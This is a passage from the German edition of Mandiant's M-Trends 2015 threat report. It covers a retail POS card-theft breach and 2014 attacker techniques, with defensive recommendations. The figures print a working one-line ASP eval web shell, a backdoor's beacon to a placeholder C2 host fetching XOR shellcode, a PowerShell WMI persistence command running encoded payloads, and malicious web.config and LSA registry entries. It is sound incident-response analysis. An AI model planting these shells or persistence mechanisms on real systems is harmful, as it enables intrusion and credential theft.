Abbildung 1 zeigt, was dabei im System­ereignisprotokoll von Windows aufge­zeichnet wird.

Abbildung 1: Das Metasploit-Modul psexec_command installiert einen Service .

A service was installed in the system.Service Name: MRSWxwQmQxFGumEFsWService File Name: %COMSPEC% /C echo dir ^> %SYS-TEMDRIVE%\WINDOWS\Temp\TthwsVKvUhydrsNB.txt > \WINDOWS\Temp\RbhRmgALAHcdyWXG.bat & %COMSPEC% /C start %COMSPEC% /C \WINDOWS\Temp\RbhRmgALAHcdyWXG.batService Type: user mode serviceService Start Type: demand start

Die Funktionen dieser Backdoor befinden sich in Shellcode, den der Gerätetreiber in Prozesse einschleust, die im Benutzer-bereich, also außerhalb des Windows- Kernels, ausgeführt werden . Dieser Shell-code schickt dann eine HTTP-POST-Ab-frage an eine hartkodierte IP-Adresse und lädt einen HTML-Kommentar herunter, der mit XOR kodierten Shellcode enthält .

Dank dieser Methode war die Backdoor sehr vielseitig einsetzbar . Wenn der An-greifer neue Funktionen benötigte, konn-te er einfach neuen Shellcode herunter-laden und ausführen . Diese Nutzung von Shellcode ist nicht neu, aber durch die Kombination mit dem Packer war sie we-sentlich schwerer zu finden als ältere Varianten .

Abbildung 2 zeigt die Kommunikation zwischen der Backdoor und dem Command-und-Control-Server (CnC-Server) .

Datendiebstahl

Nachdem er das Kennwort des Domänen-administrators geknackt hatte, stand dem Angreifer die gesamte Windows-Umge-bung der Kaufhauskette offen .

Abbildung 2: Kommunikation zwischen CnC-Server und Backdoor

POST /evil.txt HTTP/1.0Accept: */*Content-Length: 32Content-Type: application/octet-streamUser-Agent: Evil_UA_StringHost: 1.2.3.4Pragma: no-cache<POST_DATA>

<!-XOR_Encoded_Shellcode -->

Backdoor schickt HTTP-POST-Abfrage an CnC-Server.

Mit XOR kodierter Shellcode wird heruntergeladen und ausgeführt.

gehacktes System

CnC-Server des

Angreifers

Page 12: M-Trends 2015: Ein Blick in die Praxis

10 www .mandiant .com

Ein Bericht von der CyberfrontM-Trends

Alle POS-Terminals in der gesamten Kauf-hauskette nutzten denselben Domänen-controller für die Authentifizierung . Wer also Zugang zum Domänencontroller der Verkaufsdomäne hatte, konnte direkt auf alle POS-Terminals zugreifen .

Er konzentrierte sich jedoch auf die Ver-kaufsumgebung .

Diese Umgebung war wie folgt konfigu-riert:

• Zwischen der Verkaufsdomäne und der Zentraldomäne des Unterneh-mens war ein Two-Way-Trust konfiguriert .

• Auf den POS-Terminals lief Microsoft Windows XP .

• Die POS-Terminals waren mit der Verkaufsdomäne verbunden .

Diese im Einzelhandel weit verbreitete Konfiguration hat zwei Schwachpunkte, die der Angreifer ausnutzen konnte .

Erstens konnte er die zuvor erbeuteten Anmeldedaten des Domänenadministra-tors der Zentraldomäne nutzen, um privi-legierten Zugriff auf die Verkaufsdomäne zu erlangen .

Zweitens war die Verkaufsdomäne eine untergeordnete Domäne der Zentraldo-mäne . Manche Funktionen funktionierten nur, wenn bestimmte wichtige Ports zwi-schen der Zentral- und Verkaufsdomäne offen blieben . Über diese offenen Ports konnten jedoch alle Firewall-Kontrollen der Kaufhauskette um gangen werden . Der Angreifer nutzte diese offenen Ports, um auf den Domänencontroller zuzugrei-fen und von dort in die Verkaufsdomäne zu gelangen .

Alle POS-Terminals in der gesamten Kauf-hauskette nutzten denselben Domänen-controller für die Authentifizie rung . Wer also Zugang zum Domänencontroller der Verkaufsdomäne hatte, konnte direkt auf alle POS-Terminals zugreifen . Der Angrei-fer nutzte eine Windows-Batchdatei auf

dem Domä nencontroller der Verkaufsdo-mäne, um alle POS-Terminals in der ge-samten Kaufhauskette mit Malware zum Stehlen von Kreditkartendaten zu infizie-ren .

Der Angreifer führte die Malware als ge-plante Windows-Aufgabe aus . Die auf den POS-Terminals installierte Malware las die auf dem Magnetstreifen der Kreditkarten gespeicherten Kartennummern und das Ablaufdatum sowie weitere Transaktions-details aus dem Prozessspeicher der POS-Anwendung aus und sammelte sie . Angreifer können diese Daten an andere Kriminelle verkaufen, die Kreditkarten fälschen .

Zum Erfassen der Kreditkarten- und Transaktionsdaten nutzte die Malware OSQL, ein befehlszeilenbasiertes Tool für SQL-Abfragen, das bereits auf den POS-Terminals installiert war . Die gestohlenen Daten wurden dann in einer temporären MSSQL-Datenbank namens tempdb gespeichert . Wenn MSSQL gestoppt wird, werden alle Daten in tempdb automatisch gelöscht . Einmal täglich startete der Angreifer eine SQL-Abfrage, um die Daten aus den tempdb aller POS-Terminals in einer Textdatei auf dem Domänencontrol-ler zu speichern .

Dort archivierte er die Textdatei und schickte sie an eine mit dem Internet ver-bundene Workstation in der Verkaufsdo-mäne . Von dieser Workstation aus konnte er die archivierte Datei mit den gestohle-nen Daten per FTP an einen von ihm kon-trollierten Server schicken .

Abbildung 3 stellt den Verlauf des Angriffs grafisch dar .

Page 13: M-Trends 2015: Ein Blick in die Praxis

www .mandiant .com 11

Abbildung 3: Verlauf des Angriffs

Der Angreifer bricht aus der virtualisierten Anwendungsumgebung aus und erkundet das Unternehmensnetzwerk. Dort erbeutet er Anmeldedaten für weitere Systeme.

2 Der Angreifer nutzt den Domänencontroller der Verkaufsdomäne, um auf die POS-Termi-nals zuzugreifen und sie mit Malware zum Stehlen von Kreditkarten- und Transaktions-daten zu infizieren.

3

Der Angreifer meldet sich mit gültigen Anmeldedaten per Fernzugriff an einem Server des Opfers an, auf dem eine virtualisierte Anwendung läuft.

1 Der Angreifer überträgt die gestohlenen Daten von den POS-Terminals über den Domänencontroller der Verkaufsdomäne auf eine Benutzer-Workstation in derselben Domäne. Von dort überträgt er sie mit FTP auf einen externen Server.

4

virtueller Anwendungs-

server

Haupt-domänen-controller

Domänencon-troller der Verkaufs-domäne

Benutzer-Workstation

erster Zugriff Ausschleusen der Daten via FTP

Benutzer-Workstation

POS-Ter-minal 1

POS-Ter-minal 2

Laden 2

VerkaufsdomäneZentraldomäne

DMZ

POS-Ter-minal1

POS-Ter-minal 2

Laden 1

Kommunika-tion mit dem CnC-Server

Angreifer

Page 14: M-Trends 2015: Ein Blick in die Praxis

12 www .mandiant .com

Ein Bericht von der CyberfrontM-Trends

Fazit : Wo Geld ist, sind auch Kriminelle nicht weit. Einzelhändler gehören schon seit Langem zu den bevorzugten Zielen von Internetkriminellen. Daran hat sich auch 2014 nichts geändert. Die Angreifer nutzten zwar einige neue Angriffsma schen und das Medieninteresse an ihren Aktivitäten stieg, doch ihr „Modus Operandi“ hat sich im Vergleich zu den Vorjahren nicht grundlegend geändert.

Empfehlungen

Der in der Fallstudie beschriebene Angriff wäre so in Europa nicht möglich, doch auch hier rollt eine regel-rechte Lawine von Angriffen auf Online-Händler und andere Unternehmen zu, die Online-Transaktionen abwickeln . Sie können nicht jeden Angriff abwehren, doch die folgenden Maßnahmen erschweren es An-greifern, in Ihre Umgebung einzudringen und diese auszuspionieren . Mit den richtigen Tools und einem wachsamen Sicherheitsteam können Sie den Verlauf eines Angriffs verlangsa men . Dadurch gewinnen Sie Zeit, um den Angriff aufzudecken, zu untersuchen und zu reagieren, bevor der Angreifer sein Ziel erreicht hat .

Sicherer FernzugriffAnalysieren Sie, mit welchen Methoden Ihre Angestellten, externe Mitarbeiter und Zuliefe-rer per Fernzugriff auf Ihre Infrastruktur zu-greifen . Bemühen Sie sich, die Anzahl der ver-fügbaren Zugriffsmethoden, die Anzahl der autori sierten Nutzer und alle anderen Aspekte des Fernzugriffs auf ein kontrollierbares Maß einzuschränken . Legen Sie Richtlinien für starke Kennwörter fest und stellen Sie alle Zugriffs-methoden auf Zwei-Faktor-Authentifizierung um . Durchsuchen Sie die Logdateien für den Fernzugriff kontinuierlich nach Anzeichen ver-dächtiger Aktivitäten .

Sicherer Zugang zur PCI-DSS-Umgebung

Schotten Sie Ihre Umgebung für Zahlungen ge-mäß dem Payment Card Industry Data Security Standard (PCI DSS) vom Rest Ihres Intranets ab . Der Zugang zu Systemen in der PCI-DSS-Umgebung sollte nur über einen von einem siche ren Jumpserver kontrollierten Tunnel möglich sein . Damit befinden sich Ihre POS- Terminals effektiv in einem Hochsicherheits-bereich . Der Zugriff auf den Jumpserver sollte mit Zwei-Faktor-Authentifzierung gesichert sein .

Trennen Sie die Verkaufsdomäne nach Möglich-keit vom Rest des Intranets ab, um die Anzahl der möglichen Einfallstore für diese Domäne zu minimieren . Als zusätzliche Sicherheitsmaß-nahme sollte der Aufbau von Netzwerkverbin-dungen aus der Verkaufsdomäne auf Verbindun-

gen zu einer genehmigten Liste geprüfter IP-Adressen beschränkt werden, die für den Geschäftsablauf erforderlich sind .

Whitelist von Anwendungen für kritische Ressourcen

Um das Risiko einer Malware-Infektion sicher-heitskritischer Systeme zu minimieren, sollten auf diesen Systemen nur Anwendungen ausge-führt werden dürfen, die sich auf einer Whitelist geprüfter und genehmigter Anwendungen be-finden . Als sicherheitskritisch sollten alle Jump-server, Domänencontroller und sämtliche Syste-me gelten, auf denen Kreditkartendaten verar-beitet werden .

Management privilegierter Konten

Privilegierte Konten sind für Angreifer beson- ders interessant, darunter das des Systemad-ministrators und des Domänenadministrators sowie Dienstkonten . Halten Sie die Anzahl pri-vilegierter Konten so niedrig wie möglich . Sor-gen Sie dafür, dass die Systemadministrator-konten für verschiedene Systeme unterschied-liche Kennwörter haben . Erwägen Sie den Ein- satz einer Kennwortverwaltung zur Unterstüt-zung Ihrer Systemadministratoren bei der Ver-waltung zahlreicher verschiedener Kennwörter . Manche dieser Tools können Kennwörter auto-matisch nach jeder Nutzung ändern, um das Knacken privilegierter Konten zusätzlich zu er-schweren .

Page 15: M-Trends 2015: Ein Blick in die Praxis

www .mandiant .com 13

Es ist eine Art Wettrüsten: Sicherheitsteams implementieren neue Sicherheitsmaßnah-men und Angreifer finden Wege, um diese

Maßnahmen zu umgehen . Das blieb auch 2014 so .Wir untersuchten mehr Vorfälle, bei denen Angrei-fer das VPN des Opfers hackten, um sich dauer-haften Zugang zu seiner Infrastruktur zu verschaf-fen . Zudem beobachteten wir clevere neue Tricks, um unentdeckt zu bleiben, sowie neue Tools und Methoden zum Stehlen von Anmeldedaten und Ausspionieren gehackter Umgebungen .

Hacken von VPN

Ein Hacker, der sich Zugriff auf das VPN seines Opfers verschaffen kann, hat zwei große Vorteile . Erstens hat er dadurch dauerhaft Zugang zur ge-hackten Infrastruktur, ohne Backdoors einrichten zu müssen . Zweitens kann er privile gierte Nutzer nachahmen, um unauffällig zu bleiben .

Wir hatten bereits in früheren Jahren beobach- tet, dass manche Angreifergruppen gezielt VPN- Ressourcen und -Anmeldedaten ins Visier nehmen, sobald sie in ein Netzwerk eingedrungen sind . Doch 2014 wurde ein neuer Rekord gesetzt: Wir sahen mehr Fälle, in denen Angreifer Zugang zum VPN ihres Opfer erlangten, als je zuvor .

Bei den meisten dieser Angriffe wurde eine der fol-genden beiden Methoden genutzt:

• Ein-Faktor-Authentifizierung: Wo nur ein Benutzername und Kennwort erforderlich waren, um auf das VPN zuzugreifen, nutzten die Angreifer Anmeldedaten, die sie von einem gehackten Computer oder der gehackten Active-Directory-Domain gestohlen hatten .

• Zertifikatsbasierte Zwei-Faktor-Authenti-fizierung: Wo das VPN des Opfers ein benutzerspezifisches digitales Zertifikat als zweiten Authentifizierungsfaktor verlangte, nutzten Angreifer gängige Tools wie Mimikatz,

Trend Nr. 3: Raffiniertere AngriffsabläufeDie meisten von uns untersuchten Vorfälle folgen demselben Schema. Wir nennen dies den Lebenszyklus eines Angriffs.

um diese Zertifikate von gehackten Benutzer-computern zu extrahieren . In einigen Fällen gelang es den Angreifern auch, VPN-Zertifika-te abzufangen, die über unsichere Kommuni-kationskanäle an ihre legitimen Eigentümer geschickt wurden, beispielsweise als Anhang einer unver schlüsselten E-Mail oder über eine offene Netzwerkfreigabe .

In seltenen Fällen nutzten Angreifer Methoden, mit denen die VPN-Authentifizierung komplett umgangen werden konnte . Ein solches Beispiel war „Heartbleed“, eine Schwachstelle in der Erweite-rung Heartbeat des Protokolls Transport Layer Se-curity (TLS), die im April 2014 Schlagzeilen machte . Angreifer konnten betroffene Systeme und Geräte dazu bringen, bei jeder Abfrage bis zu 64 Kilobyte Daten aus dem Systemspeicher preiszugeben .

Forscher bezweifelten zunächst, dass mit dieser Methode tatsächlich sensible Daten wie Verschlüs-selungsschlüssel oder Anmeldedaten von echten Systemen gestohlen werden konnten .

Die schlimmsten Befürchtungen erwiesen sich je-doch als zutreffend . Wenige Wochen nach Bekannt-werden von Heartbleed untersuchten wir einen Fall, in dem der Angreifer diese Schwachstelle in ei-nem VPN-Gerät ausnutzte, um die authentifizierten Sitzungen autorisierter Nutzer zu übernehmen und sich – völlig ohne Anmeldedaten – Zugang zum VPN zu verschaffen . In den folgenden Wochen nutzten Angreifer Heartbleed, um in die VPN-Infrastruktu-ren weiterer Opfer einzudringen .

Bessere Tarnung für Malware

Die Malwareerkennung ist mit einem ständigen Wettrüsten zwischen Angreifern und Verteidigern vergleichbar . Das bestätigte sich auch 2014 wieder . Angreifer fanden mehrere neue Methoden, um ihre Aktionen zu verschleiern und Malware auf infizier-ten Systemen zu verbergen .

Page 16: M-Trends 2015: Ein Blick in die Praxis

14 www .mandiant .com

Ein Bericht von der CyberfrontM-Trends

Bessere Verstecke für Webshells

Webbasierte Backdoors, die sogenannten Web-shells, sind ein mindestens zehn Jahre alter Mal-waretyp . Dank neuer Methoden bleiben sie bei netzwerk- und hostbasierten Malwarescans unent-deckt und gehören weiterhin zu den bevorzugten Tools für gezielte Angriffe .

In mehreren von uns untersuchten Fällen hatten Angreifer ihre Webshell auf einem Server mit SSL- Verschlüsselung (Secure Socket Layer) installiert . Dadurch wurden alle mit der Backdoor ausge-tauschten Daten mit dem privaten Schlüssel des Servers verschlüsselt . Da die Opfer ihre Netzwerk-architektur so konfiguriert hatten, dass ihre Sicher-heitstools mit SSL verschlüsselte Daten nicht unter-suchen konnten, wurden die Aktivitäten des Angrei-fers nicht erkannt .

Wir gehen davon aus, dass diese Angriffsform in Zukunft häufiger genutzt werden wird, da die SSL- Verschlüsselung in immer mehr Unternehmen auf alle öffentlich zugänglichen Bereiche der Website ausgedehnt wird .

Abbildung 4: Neue Angriffsmethoden, die Mandiant bei Untersuchungen beobachtete

Eindringen Fuß fassen Privilegien ausweiten

Umgebung ausspionieren

Ziel erreicht

weitere Systeme infizieren

unent-deckt bleiben

Hacken von VPNMandiant beobachtete 2014 eine Rekordzahl von Fällen, in denen Angreifer sich Zugang zum VPN ihres Opfers verschafften. Schädliche Sicherheitspakete

Angreifer nutzten die Windows Security Package Extensibility aus, um Backdoors und Kennwortlogger zu installieren.

Verstecken von WebshellsAngreifer fanden auch 2014 wieder neue Maschen zum Einschleusen und Verstecken webbasierter Malware. Unter den von Mandiant beobachteten Methoden waren:• Installieren schädlicher Shells auf Servern mit

SSL-Verschlüsselung, um die Netzwerküber-wachung zu umgehen,

• Einbetten einer einzigen Shellcode-Zeile mit dem Kommando „eval“ in eine seriöse Website,

• Ändern von Serverkonfigurationsdateien zum Laden schädlicher DLLs.

Einsatz von WMI und Power-ShellAngreifer nutzen zunehmend WMI und PowerShell, zwei leistungs-starke Windows-Komponenten, um dauerhaft Zugang zu einer Infrastruktur zu erhalten, diese auszuspionieren und Daten zu stehlen.

Kerberos-AngriffeNachdem sie sich die Zugriffsrechte eines Domänenadminis-trators verschafft hatten, konnten Angreifer sich mit dem sogenannten „Kerberos Golden Ticket“ Zugang zu beliebigen anderen privilegierten Konten verschaffen – selbst nachdem alle Kennwörter in der Domäne geändert worden waren.

Unverschlüsselte KennwörterAngreifer nutzten neu kompilierte Varianten des Tools Mimikatz, um unverschlüsselte Kennwörter aus dem Arbeitsspeicher zu stehlen, ohne von Antivirensoftware entdeckt zu werden.

Wenn Schutzmaßnahmen weiter-entwickelt werden, passen Angrei-fer sich an und finden neue Angriffsmethoden. Im Jahr 2014 beobachteten wir auf jeder Etappe des Angriffs-Lebenszyklus neue Methoden. Im Folgenden stellen wir einige der Ergebnisse vor.

In einer anderen von uns beobachteten Angriffs-form wurde eine Shell in eine Webseite des Ziel-unternehmens eingeschleust . Diese Shell enthielt das Kommando „eval“, das per HTTP-Abfrage über-mittelten Shellcode ausführt und damit hervorra-gend als Backdoor geeignet ist . Der Code für eine Shell mit dem Kommando „eval“ kann weniger als 100 Byte lang sein und lässt sich daher leicht in ei­ner größeren HTML-Datei verstecken .

Auf normale HTTP-Abfragen reagiert die gehackte Webseite weiterhin wie zuvor . Doch wenn ein An-greifer die Seite mit dem richtigen Parameter auf-ruft, führt das Kommando „eval“ den übermittelten schädlichen Code aus .

Abbildung 5 zeigt den Code für eine Shell mit dem Kommando „eval“ . Dies ist eine vollständige Shell, die so in einer eigenen Webseite implementiert oder in eine andere Website eingebettet werden könnte . Der Angreifer würde seinen schädlichen Code als Parameter p1 der HTTP-Abfrage übermit-teln .

Page 17: M-Trends 2015: Ein Blick in die Praxis

www .mandiant .com 15

In vergangenen Jahren hatten wir nur wenige WMI-basierte Angriffe beobachtet . Das lag vermutlich daran, dass die Nutzung von WMI recht kompliziert ist und den meisten Angreifern einfachere Metho-den ausreichten, um in einer gehackten Umgebung unentdeckt zu bleiben . Im Jahr 2014 beobachteten wir jedoch mehrere Angreifergruppen, die WMI für diesen Zweck einsetzten .

Für die von uns beobachtete Methode erstellten die Angreifer drei WMI-Objekte, in der Regel mit PowerShell:

• Ereignisfilter: Der Filter ermittelt, ob ein bestimmtes, häufig auftretendes Ereignis eingetreten ist, beispielsweise eine bestimmte Tageszeit oder der Ablauf einer vorgegebenen Anzahl von Sekunden seit dem letzten Systemstart .

• Ereignisempfänger: Der Empfänger führt ein bestimmtes Skript bzw . einen bestimmten Befehl aus, wenn das Ereignis eintritt . Die meisten der von uns beobachteten Angreifer erstellten befehlszeilenbasierte Ereignisemp-fänger, die beliebige Befehle und Argumente ausführen konnten, oder auf Active Script basierende Ereignisempfänger, die VBS-Skripte ausführten .

• Verbindung zwischen Filter und Empfänger: Die Verbindung sorgt dafür, dass ein bestimm-ter Empfänger aufgerufen wird, wenn das in einem Filter spezifizierte Ereignis eintritt .

Abbildung 8 zeigt ein Beispiel für einen PowerShell- Befehl, der einen befehlszeilenbasierten Ereignis-empfänger erstellt . Dieser Empfänger führt power-shell.exe mit einem in Base64-codierten String als Argument aus .

Abbildung 5: Beispiel einer Webshell mit „eval“

<%@ Page Language=”Jscript”%><%eval(Request.Item[“p1”],”unsafe”);%>

Abbildung 6: Auszug aus der gehackten Datei web.config

<!--HTTP Modules --> <modules> <add type=”Microsoft.Exchange.Clients.BadModule” name=”BadModule” /> </modules>

Als letztes Beispiel in diesem Abschnitt möchten wir Sie auf eine besonders raffinierte Masche für die webbasierte Übertragung von Malware auf-merksam machen: Die Angreifer änderten die Kon-figurationsdatei web.config der Microsoft Internet Information Services (IIS) auf einem Webserver . Das veranlasste den Server, ein schädliches HTTP- Modul zu laden . Abbildung 6 zeigt eine editierte Version der Änderung in web.config .

Mit dieser Änderung wird der Server angewiesen, die Bibliothek BadModule.dll aus einem Shared Modules Directory zu laden und zur Bearbeitung aller folgenden Webabfragen zu nutzen . Die Mal-ware scannte und speicherte die Inhalte aller an den Server gerichteten Webabfragen, einschließ-lich aller von Benutzern übermittelten Anmeldeda-ten . Das in Abbildung 6 gezeigte Beispiel wurde von uns geändert . Der Angreifer gab dem schädlichen Modul den Namen einer echten Microsoft-DLL und änderte den Zeitstempel der Malware und der Kon-figurationsdatei, um seine Spuren zu verwischen .

Dauerhafter Zugang mit WMI

Die Windows-Verwaltungsinstrumentation (Win-dows Management Instrumentation, WMI), eine Kernkomponente des Betriebssystems Windows, enthält ein breites Spektrum an Funktionen und Benutzer oberflächen für die Systemverwaltung . Anwendungen und Skriptsprachen wie PowerShell und VBScript können die WMI nutzen, um Daten zu erfassen, auf Komponenten auf den unteren Ebe-nen des Betriebssystems zuzugreifen und Befehle auszuführen . Darüber hinaus enthält die WMI ein Ereignisframework, das die Ausführung einer vom Benutzer angegebenen Anwendung veranlassen kann, wenn der Status eines bestimmten Objekts sich ändert . Anstelle einer seriösen Anwendung ließen die von uns beobachteten Angreifer Malware ausführen .

Page 18: M-Trends 2015: Ein Blick in die Praxis

16 www .mandiant .com

Ein Bericht von der CyberfrontM-Trends

Abbildung 7: So verschafften Angreifer sich mit WMI dauerhaften Zugriff

WMI testet regelmäßig, ob das im Ereignisfilter spezifizierte Ereignis eingetreten ist. In diesem Beispiel wird die Bedingung täglich um 8.05 Uhr erfüllt. 2

Wenn das im Filter spezifizierte Ereignis eintritt, ruft WMI automatisch den mit diesem Filter verbundenen Ereignisempfänger auf. Das Beispiel zeigt einen Teil eines befehls-zeilenbasierten Ereignisempfängers, der PowerShell mit zusätzlicher Malware ausführt, die vom Angreifer als Base64-codierter Parameter bereitgestellt wird.

3

Mit PowerShell-Befehlen erstellt der Angreifer drei Ereignisobjekte in WMI: einen Empfänger, der einen Befehl oder ein Skript ausführt, einen Filter, der das System auf eine häufig auftre-tende Situation überprüft, und eine Verbindung zwischen dem Filter und dem Empfänger.

1WMI-Namespace (root\subscription)

Ereignisempfänger„Führe dieses Skript/diesen Befehl aus …“

Ereignisfilter„Frage nach, ob dieses Ereignis

eingetreten ist …“

Verbindung zwischen Filter und Empfänger„Nutze diesen Filter, um den Empfänger

aufzurufen.“

Set-WmiInstance

SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 08 AND TargetInstance.Minute = 05 GROUP WITHIN 60

CommandLineTemplate="C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe –NonInteractive –enc SQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAALQBDAG8AbQBwAHUAdABl..."

Page 19: M-Trends 2015: Ein Blick in die Praxis

www .mandiant .com 17

Der String könnte zusätzlichen PowerShell-Code enthalten, beispielsweise ein einfaches Download- Tool oder eine Backdoor, und den Angreifern so das Installieren einer Skriptdatei auf der Festplatte er-sparen . Wenn dieser Empfänger mit einem geeig-neten Ereignisfilter verbunden wäre, könnte er wie-derholt ausgeführt werden .

WMI-basierte Methoden für den langfristigen Zu-griff auf eine gehackte Infrastruktur sind bei einer forensischen Analyse nur schwer zu erkennen, da die Angreifer Ereignisfilter und -empfänger auf eine m System definieren und diese mithilfe von PowerShell-Befehlen auf demselben oder einem anderen System ausführen können . Im Gegensatz zu vielen anderen Methoden für den Erhalt eines dauerhaften Zugriffs hinterlässt dies auch keine Spuren in der Registry .

Die Objekte befinden sich im WMI-Repository ob-jects.data, einer komplexen Datenbank auf der Fest-platte, die sich nicht leicht auf schädliche Objekte durchsuchen lässt . Darüber hinaus überprüft Win-dows neu erstellte oder aktivierte Ereignisfilter und -empfänger nur, wenn die Protokollierung auf der Debug-Ebene aktiviert ist . Dabei wird jedoch eine so hohe Anzahl von Ereignissen aufgezeichnet, dass dies nicht die Standardoption ist und die langfristi-ge Nutzung nicht empfohlen wird .5

Schädliche Sicherheitsmodule

Wir haben mehrere Fälle untersucht, in denen An-greifer Sicherheitsmodule in der lokalen Sicherheits-autorität (Windows Local Security Authority, LSA) ausnutzten, um automatisch und unbemerkt Mal-ware herunterzuladen . Sicher heitsmodule sind DLL-Dateien, die unter ver schiedenen Werten un-ter dem Registrierungs schlüssel HKLM\SYSTEM\CurrentControlSet\Control\Lsa konfiguriert und beim Systemstart von der LSA geladen werden . Jeder dieser Werte enthält eine Liste von Dateinamen (ohne die Dateierweiterung), die von %SYSTEM-ROOT%\system32\ zu laden sind .

Da LSA-Module automatisch von LSASS.EXE gela-den werden, kann ein Angreifer mit Administrator-rechten diese Liste erweitern oder ändern, um bei jedem Systemstart schädliche DLLs zu laden . In ei-nem von uns 2014 untersuchten Fall änderte der Angreifer den Wert von Security Packages, um si-cherzustellen, dass das zum Herunterladen genutz-te Tool der aus mehreren Komponenten bestehen-den Backdoor tspkgEx.dll auf dem System verblieb .6

Abbildung 9 zeigt den geänderten Wert .

Diese Änderung veranlasst LSASS.EXE, bei jedem Systemstart C:\WINDOWS\system32\tspkgEx.dll zu laden .

5 Auf der Mandiant-Konferenz MIRcon 2014 wurden Vorträge zu den Themen WMI und PowerShell gehalten, die diese Methoden ausführlicher be-schrieben . Die Vorträge enthielten Fallstudien und Ratschläge für das Aufdecken und die forensische Analyse . Die Präsentationen sind unter https://dl .mandiant .com/EE/library/MIRcon2014/MIRcon_2014_IR_Track_There%27s_Something_About_WMI .pdf und https://dl .mandiant .com/EE/library/MIR-con2014/MIRcon_2014_IR_Track_Investigating_Powershell_Attacks .pdf verfügbar .

6 DLL-Name von uns geändert .

Abbildung 8: Auszug aus einem PowerShell-Befehl zum Erstellen eines WMI-Empfängers

Set-WmiInstance -Namespace “root\subscription” -Class ‘CommandLineEventConsum-er’ -Arguments @{ name=’EvilWMI’;CommandLineTemplate=”C:\WINDOWS\System32\Win-dowsPowerShell\v1.0\powershell.exe –enc SQBuAHYAbwBrAGUALQBDAG8AG8A-bQ...<SNIP>”;RunInteractively=’false’}

Abbildung 9: Geänderte HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages, die Malware lädt

SECURITY PACKAGES (unverändert): kerberos msv1_0 schannel wdigest tspkg pku2u

SECURITY PACKAGES (geändert): kerberos msv1_0 schannel wdigest tspkg pku2u tspkgEx

Page 20: M-Trends 2015: Ein Blick in die Praxis

18 www .mandiant .com

Ein Bericht von der CyberfrontM-Trends

Da LSA erweiterbar ist, kann es auch um speziell erstell te Module erweitert werden, die beim Login die Anmeldedaten des Benutzers über prüfen . Ein schädliches „Sicherheitsmodul“ kann diese Funktion missbrauchen, um bei Anmeldeversuchen unver-schlüsselte Kennwörter abzufangen .

Wir untersuchten 2014 einen gezielten Angriff, bei dem der Angreifer Malware für genau diesen Zweck als „Sicherheitsmodul“ lud . Das weit verbreitete Toolkit Mimikatz7 enthält ebenfalls ein „Sicherheits-modul“ zum Stehlen von Kennwörtern, mimilib.ssp .8

Tools und Tricks für den Kennwort-diebstahl

Tools zum Stehlen von Anmeldedaten sind auf dem Schwarzmarkt inzwischen so weit verbreitet, dass das Entwenden von Kennwörtern und das Erlangen von Zugriffsrechten in Windows-Umgebungen deutlich einfacher sind als früher . Bei gezielten An-griffen kam 2014 meist eine der beiden folgenden Methoden zum Einsatz:

• „Pass the Hash“, also die Anmeldung mit einem gestohlenen NTLM-Hashwert, ohne diesen zu knacken,

• Stehlen unverschlüsselter Kennwörter aus dem Arbeitsspeicher mit Mimikatz .

In Windows Server 2012 R2 und Windows 8 .1 hat Microsoft die Wirksamkeit dieser Methoden einge-schränkt, völlig unmöglich sind sie dadurch jedoch noch immer nicht . Die meisten Kunden, mit denen wir im vergangenen Jahr zusammenarbeiteten, nutzten außerdem noch Domänen mit Windows Server 2008 und Endpunkte mit Windows 7 . „Pass the Hash“ ist daher eine bewährte und weiterhin erfolg versprechende Methode, insbesondere wenn mehrere Systeme in einer Umgebung dasselbe Ad-ministratorkennwort haben .

Mimikatz geht einen Schritt weiter: Es stiehlt un-verschlüsselte Windows-Kennwörter, die vom Sys-tem im Arbeitsspeicher abgelegt wurden, um ver-schiedene Formen von Single-Sign-On zu unter-stützen .

Auf dem Computer eines Mitarbeiters sind die Aus-wirkungen eines solchen Angriffs wahrscheinlich auf den Diebstahl des Domänenkennworts dieses Mitarbeiters begrenzt . Auf einem gemein sam ge-nutzten Server, auf dem viele Benutzer sich mit dem Remote Desktop Protocol (RDP), dem Tool PsExec oder anderen Methoden interaktiv anmel-den, könnten dagegen potenziell sehr viele Kenn-wörter gestohlen werden . Die Opfer eines solchen Angriffs sind meist überrascht, wie schnell ein An-greifer eine ganze Domäne in Active Directory un-ter seine Kontrolle bringen kann, nachdem er sich Zugang zu einigen wenigen Systemen verschafft hat .

In fast allen von uns untersuchten Fällen wurde Mimikatz von der Antivirensoftware des Opfers weder erkannt noch abgewehrt, obwohl dieses Tool weit verbreitet und sehr bekannt ist . Die meisten Angreifer änderten den Quellcode leicht oder kom-pilierten ihn einfach nur neu, um Antivirensoftware zu umgehen . Manche nutzten auch Variationen wie das PowerShell-Skript „Invoke-Mimikatz“, das voll-ständig im Arbeitsspeicher ausgeführt werden kann .

Außerdem beobachteten wir 2014 mehrere neue Angriffsmethoden, die auf den Authentifizierungs-mechanismus Kerberos abzielten, der in modernen Windows-Domänen standardmäßig verwendet wird . Die Mimikatz-Masche „Golden Ticket“ ist viel-leicht die gefährlichste und berüchtigtste dieser Methoden . Mit ihr kann ein Angreifer, der einen Domänencontroller gehackt hat, ein Kerberos- Ticket erstellen, das das Zuweisen beliebiger Zu-griffsrechte an andere Benutzer erlaubt .

In fast allen von uns untersuchten Fällen wurde Mimikatz von der Anti-virensoftware des Opfers weder erkannt noch abgewehrt, obwohl dieses Tool weit verbreitet und sehr bekannt ist . Die meisten Angreifer änderten den Quellcode leicht oder kompilierten ihn einfach nur neu, um Antiviren-software zu umgehen .

7 https://github .com/gentilkiwi/mimikatz5 8 Auf der Mandiant-Konferenz MIRcon 2014 präsentierte Matt Graeber weitere Untersuchungsergebnisse zu schädlichen Sicherheitsmodulen sowie

Hinweise zu deren Aufdeckung und Abwehr . Diese Präsentation ist unter https://dl .mandiant .com/EE/library/MIRcon2014/MIRcon_2014_IR_Track_Analysis_of_Malicious_SSP .pdf verfügbar .

Page 21: M-Trends 2015: Ein Blick in die Praxis

www .mandiant .com 19

